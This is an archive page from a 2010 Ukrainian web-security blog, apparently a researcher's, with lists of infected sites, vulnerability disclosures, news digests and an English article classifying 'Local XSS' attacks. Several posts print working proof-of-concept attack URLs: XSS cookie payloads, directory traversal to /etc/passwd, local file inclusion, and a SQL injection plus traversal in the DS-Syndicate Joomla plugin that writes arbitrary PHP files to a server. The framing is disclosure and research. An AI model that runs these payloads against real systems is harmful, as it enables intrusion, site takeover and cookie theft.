Архів за Травень, 2010

Інфіковані сайти №29

22:42 24.05.2010

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://pes-world.org.ua - інфекція була виявлена 24.05.2010. Зараз сайт не входить до переліку підозрілих.
  • http://businessgo.info - інфекція була виявлена 24.05.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
  • http://flshgamer.info - інфекція була виявлена 05.04.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
  • http://realset.od.ua - інфекція була виявлена 30.04.2010. Зараз сайт не входить до переліку підозрілих.
  • http://investpul.biz.ua - інфекція була виявлена 11.05.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.

Уразливості на qwert.com.ua

19:13 24.05.2010

21.11.2009

У березні, 13.03.2009, я знайшов Full path disclosure, Cross-Site Scripting, Directory Traversal, Local File Inclusion та Redirector уразливості на сайті http://qwert.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

24.05.2010

Full path disclosure:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Directory Traversal:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=../../../../../../../etc/passwd%00

Local File Inclusion:

http://qwert.com.ua/openx/www/delivery/fc.php?MAX_type=../file.php

Redirector:

http://qwert.com.ua/openx/www/delivery/ck.php?dest=http://websecurity.com.ua
http://qwert.com.ua/openx/adclick.php?maxdest=http://websecurity.com.ua
http://qwert.com.ua/openx/adclick.php?dest=http://websecurity.com.ua

Дані уразливості вже виправлені (за рахунок оновлення движка). Окрім Redirector уразливостей, також відомих як URL Redirector Abuse (в WASC TC v2).

DoS уразливість в Adobe Flash Player

15:03 24.05.2010

Виявлена Denial of Service уразливість в плеєрі Adobe Flash.

Уразливі версії: Adobe Flash Player 10.0.

Через атаку на Flash плеєр можливе споживання пам’яті та вибивання системи.

  • Adobe Flash Player 10.0 Denial Of Service Vulnerability (деталі)

Нові уразливості в DS-Syndicate для Joomla

23:55 22.05.2010

Сьогодні я знайшов нові уразливості в плагіні DS-Syndicate для Joomla - це Full path disclosure, Cross-Site Scripting та Directory Traversal уразливості. Дірки виявив на одному веб сайті, що використовує даний плагін. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в DS-Syndicate для Joomla.

Full path disclosure:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=1%0A1

Хоча дана FPD має місце в тому самому скрипті і тому самому параметрі, але вона виводить трохи більше інформації ніж попередня FPD і проявляється не в одному, а одразу в двох скриптах. Тобто її потрібно виправляти окремо.

XSS (через SQLi + FPD):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,1,1,1,1,0x3C7363726970743E616C65727428646F63756D656E742E636F6F6B6965293C2F7363726970743E,1,1,1,1,1,1,1,1,1,1,1,1,1,1%0A%23

При XSS (через SQLi) код не виконується в браузері (бо виводиться xml), а при XSS (через SQLi + FPD) код виконується в браузері (бо виводиться html). Тільки через SQL Injection неможна провести XSS атаку, тому що код не виконується в браузері, а при використані разом SQLi та FPD можна провести XSS атаку.

Directory Traversal:

Для запису будь-яких файлів, зокрема PHP скриптів, а також для перезапису будь-яких файлів на сервері (при відключених magic quotes):

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1.php%00

Файл доступний: http://site/1.php

Для запису xml-файлів - для проведення XSS (через XML) та LFI атак, а також для перезапису будь-яких xml-файлів на сервері:

http://site/index2.php?option=ds-syndicate&version=1&feed_id=/../../../../1

Файл доступний: http://site/1.xml

Для запису PHP скриптів та інших файлів, а також для проведення XSS та LFI атак потрібно використати один з параметрів 2, 3, 6 або 18 SQL запиту.

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,0x436F6465,0x436F6465,1,1,0x436F6465,1,1,1,1,1,1,1,1,1,1,1,0x436F6465,1,1%23/../../../../1

Вразливі всі версії DS-Syndicate для Joomla. Зазначу, що розробник плагіна більше його не підтримує, тому користувачам плагіна потрібно виправити його самотужки.

Новини: французький хакер, обхід захисту IE8 та DDoS-атаки на телефони

22:40 22.05.2010

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, у Франції арештований хакер, який зламав блог Обами на Twitter.

У Франції арештований хакер, оголошений у розшук після взлому акаунтів на сервісі Twitter, що належать ряду відомих людей, у тому числі президенту США Бараку Обамі і поп-співачці Брітні Спірс. У липні минулого року ФБР повідомили своїх французьких колег, що цей хакер знаходиться на території Франції. І у березні 2010 року він був арештований в результаті спільної із співробітниками ФБР спецоперації.

За повідомленням www.cnews.ru, DSecRG продемонстрували спосіб обходу останніх захистів IE8. Фахівці дослідницького центра DSecRG, заснованого компанією Digital Security, опублікували публічний практичний приклад обходу останніх захистів браузера IE8 від атак переповнення буфера. Техніка полягає в практичній реалізації методу JIT-Spray, що дозволяє атакувати додатки, уразливі до переповнення буфера в обхід останніх захистів, говориться в повідомленні DSecRG.

Раніше я вже розповідав про уразливість в Internet Explorer 8, що дозволяє використовувати новий захисний фільтр IE8 (XSS Filter) для атаки на користувачів даного браузера.

За повідомленням hackzona.com.ua, банківські хакери влаштовують DDoS-атаки на телефони.

Останнім часом у США почастішало використання банківськими хакерами нової методики, що дозволяє їм обходити додатковий рівень захисту при здійсненні транзакцій. Вона полягає в проведенні DDoS-атак на телефон жертви.

Методи обходу Web Application Firewall

19:02 22.05.2010

В своїй презентації Методы обхода Web Application Firewall, Дмитро Євтєєв розповів про методи обходу Web Application Firewall.

В себе на сайті я чимало писав про уразливості в WAF, в тому числі й ті, що дозволяють їх обходити, і багато разів приводив приклади дірок на сайтах з WAF, які я обійшов. А зараз можете ознайомитися з презентацією Дмитра на цю тему.

Добірка уразливостей

15:12 22.05.2010

В даній добірці уразливості в веб додатках:

  • EMC Control Center SAN Manager SST_SENDFILE Remote File Retrieval Vulnerability (деталі)
  • EMC Control Center SAN Manager Master SST_CTGTRANS Overflow Vulnerability (деталі)
  • ARISg5 (version 5.0) cross site scripting vulnerability (деталі)
  • Oracle Siebel 7.x CRM Cross Site Scripting Vulnerability (деталі)
  • ARISg5 (Version 5.0) Cross Site Scripting Vulnerability (деталі)
  • Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities (деталі)
  • [xss] i found a Cross Site Scripting Vulnerability about Discuz! ‘uid’ Parameter (деталі)
  • Eshbel Priority MarketGate module Cross Site Scripting Vulnerability (деталі)
  • Symantec Veritas Storage Foundation Memory Disclosure Vulnerability (деталі)
  • Symantec Veritas Storage Foundation Arbitrary File Read Vulnerability (деталі)

Уразливості на kpi.ua

23:52 21.05.2010

У жовтні, 22.10.2009, я знайшов Information Leakage уразливість на сайті http://kpi.ua. З якої в тому числі можна дізнатися про численні уразливості, що мали місце на даному сайті тривалий час.

Про уразливі, взломані та інфіковані КПІ-шні сайти я писав багато разів за 2008-2010 роки. Навіть писав про інфекцію на kpi.ua, що була виявлена 12.12.2009. Останній раз я писав про уразливості на codecamp.org.ua - сайті організаторів конференції CodeCamp, що проводилася минулого і цього року в КПІ.

Ситуація на http://kpi.ua не краща. Що видно з Information Leakage уразливості на даному сайті.

Information Leakage:

http://kpi.ua/CHANGELOG.txt

Прочитавши перелік виправлених дірок в Друпалі, ви можете дізнатися про численні уразливості, що тривалий час мали місце на даному сайті. Зокрема в жовтні вони використовували Drupal 5.19. Можете подивитися скільки дірок було виправлено за цей час в Drupal до тієї версії, що зараз використовується на сайті. І при цьому врахуйте, що КПІ проводить конференцію про інформаційну безпеку CodeCamp. При цьому забуваючи, як і самі організатори конференції, про безпеку власних сайтів.

Local XSS

22:46 21.05.2010

This is English version of my Local XSS article.

I’ll tell you about new type of Cross-Site Scripting vulnerabilities, Local XSS, which I created in June 2006 for better classification of XSS vulnerabilities, when found vulnerability in Ad Muncher.

Local XSS - it’s Cross-Site Scripting vulnerabilities in local software (at computer of the user, or in local network), which leads to appearance of XSS vulnerabilities. I.e. it’s such XSS vulnerabilities, which take place not directly at the site, but in local software of the user. And which allow to attack even those sites, which can even not have XSS vulnerabilities.

Particularly this type of vulnerabilities leads to appearance of so-called universal XSS, which allow to conduct attacks on multiple sites, in case when user is using vulnerable software. Examples of universal XSS are UXSS in PDF, vulnerability in Ad Muncher and vulnerability in XSS Filter in IE8.

Nuances of Local XSS.

Local XSS vulnerabilities can take place in browsers and in other programs, which concerned with work in Internet. Such as plugins for browsers, proxy servers, ad blockers (which perform function of proxy server) and others.

These vulnerabilities take place not at the site, but at user’s local computer (at using of vulnerable software), so admins of the sites and web developers often ignore such vulnerabilities. In some cases owners of the sites can do nothing concerning to these vulnerabilities (only to advice users to update vulnerable software), in other cases owners of the sites can use different protecting methods (as in case of UXSS in PDF and vulnerability in XSS Filter in IE8).

One of nuances of Local XSS is that, that they can bypass WAF at the site (due to that vulnerabilities take place on local software of the user, but not at the site). So to resist at web site to these attacks with using these vulnerabilities, it’s needed to use not WAF, but special methods (as in case of vulnerabilities in PDF and IE8).

There is such class of vulnerabilities as Cross-zone scripting. These vulnerabilities take place in browsers, particularly in Mozilla Firefox (and other browsers on Gecko engine) and in Internet Explorer (and browsers at IE engine, such as Sleipnir, Portable Sleipnir, unDonut) and in plugins (extensions, toolbars) for browsers.

Cross-zone scripting - it’s other type of XSS, then Local XSS. So these vulnerabilities don’t belong to Local XSS. Because via these vulnerabilities in browsers and plugins for them it’s possible to execute code at user’s computer (in local context), but not at web site (in context of this site). I.e. via Cross-zone scripting the attack is going to user’s computer (with his current rights), and via Local XSS - at web site (with rights of this user). But common for both types of XSS is that, that these vulnerabilities appear in local software of the user.

Types of Local XSS.

There are next types of Local XSS:

  • Reflected local XSS - the most widespread type of Local XSS.
  • Persistent local XSS - it’s Post Persistent XSS (Saved XSS), i.e. this type of XSS belongs at the same time to Persistent XSS and to Local XSS.
  • Strictly social local XSS - this type of XSS belongs at the same time to Strictly social XSS and to Local XSS.

About Post Persistent XSS (Saved XSS) sub-class of Cross-Site Scripting vulnerabilities I wrote already, and about Strictly social XSS sub-class I’ll write separate article with time.

Let’s look at examples of different types of Local XSS vulnerabilities.

Reflected local XSS.

Reflected local XSS - it’s Reflected XSS in local applications.

Examples of Reflected local XSS are the next vulnerabilities:

1. Universal XSS in PDF, which I wrote about in 2007. This vulnerability in Adobe Reader and Acrobat, and also their plugins for browsers, was found and disclosed by Stefano Di Paola at the end of 2006. For the attack it was needed to use pdf-file at any site which has pdf-file (with the exception of those ones, which made a protection against this attack on server-side).
2. Vulnerabilities in different plugins for browsers, particularly vulnerabilities in Adobe Flash Player and Adobe Acrobat. If under-mentioned persistent XSS via Flash and strictly social XSS in millions of flash files are considered by Adobe as feature of flash, then Adobe fixed above-mentioned reflected XSS.
3. Cross-Site Scripting via jar: URI in Firefox, which was found by PDP and Beford in 2007.
4. Universal XSS vulnerability in Ad Muncher, which I wrote about in 2010. The attack was going at visiting of special crafted URL, with using of which it was possible to conduct XSS attack at any site (with the exception of those cases, which I wrote about in this post).
5. Vulnerabilities in Sidki and Proxomitron, which Charles Reis, Steven D. Gribble, Tadayoshi Kohno and Nicholas C. Weaver wrote about in 2008. As they found the year after me, in 2007, to this XSS besides Ad Muncher are also vulnerable Sidki and filter sets Grypen for Proxomitron.
6. Vulnerability in Internet Explorer 8 - Eduardo Vela Nava and David Lindsay at the beginning of this year found vulnerability in XSS Filter in IE8, which allows to conduct XSS attacks on users of IE8 at any sites (with the exception of those ones, which made a protection against this attack on server-side).
7. New vulnerability in Ad Muncher, which I wrote about in 2010. The attack is similar to previous vulnerabilitiy in Ad Muncher.

Persistent local XSS.

Persistent local XSS - it’s Persistent XSS in local applications, particularly it’s Post Persistent XSS (Saved XSS) vulnerabilities.

Examples of Persistent local XSS are the next vulnerabilities:

1. Vulnerabilities in Flash plugin for browsers. At uploading of swf-files with XSS-code at the server, it’s possible to conduct an attack on users, which have flash plugin (which have more than 99% of Internet users). As I noted, Adobe isn’t considered this as security issue, because it’s feature of Flash technology, so owners of the sites and web developers need to work on security by themselves, if including of flashes is allowed (as in case of vulnerability in Invision Power Board) or if uploading of flashes is allowed (as in case of vulnerability in FCKeditor).
2. Vulnerability in QuickTime plugin for browsers. Particularly via Media Link in QuickTime at uploading of files (in xml-format) with extension mp3 at the server, it was possible to conduct the attack at users which have QT plugin (one of the popular plugins).
3. Cross-Site Scripting vulnerability in Internet Explorer, which I wrote about in 2007. Attack is going at saving of a page with specially crafted URL and next opening of this page in the browser.
4. Cross-Site Scripting vulnerability in Google Chrome, which I wrote about in 2008. Attack is similar to attack on IE.
5. Cross-Site Scripting vulnerability in Opera, which I wrote about in 2008. Attack is similar to attack on IE and Chrome.
6. Universal XSS vulnerability in Ad Muncher, which I wrote about in 2010. In this application it was possible to conduct as Reflected local XSS attack, as Persistent local XSS attack.
7. New vulnerability in Ad Muncher, which I wrote about in 2010. The attack is similar to previous vulnerabilitiy in Ad Muncher.

Strictly social local XSS.

Strictly social local XSS - it’s Strictly social XSS in local applications.

Examples of Strictly social local XSS are the next vulnerabilities:

1. Cross-Site Scripting in Mozilla and Firefox, which I wrote about in 2007. Attack is going via gopher protocol. For conducting of XSS attack is needed that user of browser Mozilla, Firefox or SeaMonkey (or other browsers on Gecko engine) go to specially crafted page and change codepage to UTF-7.
2. Cross-Site Scripting with UTF-7 in Mozilla and Firefox, which I wrote about in 2009. Attack is going via http, https and ftp protocols (this vulnerability is a continuation of previous one, in which new protocols are used).
3. Cross-Site Scripting vulnerabilities in Mozilla and Firefox, which I wrote about in 2009. Attack is going at request to location-header redirector with setting of JavaScript code. At request the browser shows page “Object Moved”, where in the link “here” shows this code, at click on which the code will execute.
4. The strictly social XSS vulnerabilities in 8 millions and 34 millions of flash files are possible via flash plugin for browsers.

Example of Local XSS.

The most bright example of Local XSS vulnerability is universal XSS in Ad Muncher. Essence of this vulnerability was in the next.

Vulnerability was possible due to that program set current URL in body of current page (without filtering of tags). So with special crafted URL it was possible to execute code at any site.

Conducting of reflected XSS attack:

http://www.google.com/webhp?%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

With using of this vulnerability it was possible to conduct XSS attack at any site (with the exception of above-mentioned cases). The attack can be conducted e.g. via hidden iframe. At that the attack worked in any browser.

Переповнення буфера в PCRE

19:24 21.05.2010

Виявлене переповнення буфера в PCRE. Що могло призвести до виконання довільного коду, або до відмови в обслуговуванні в додатках, які використовують бібліотеку PCRE.

Уразливі версії: PCRE 8.01.

Переповнення буфера при компіляції регулярних виразів.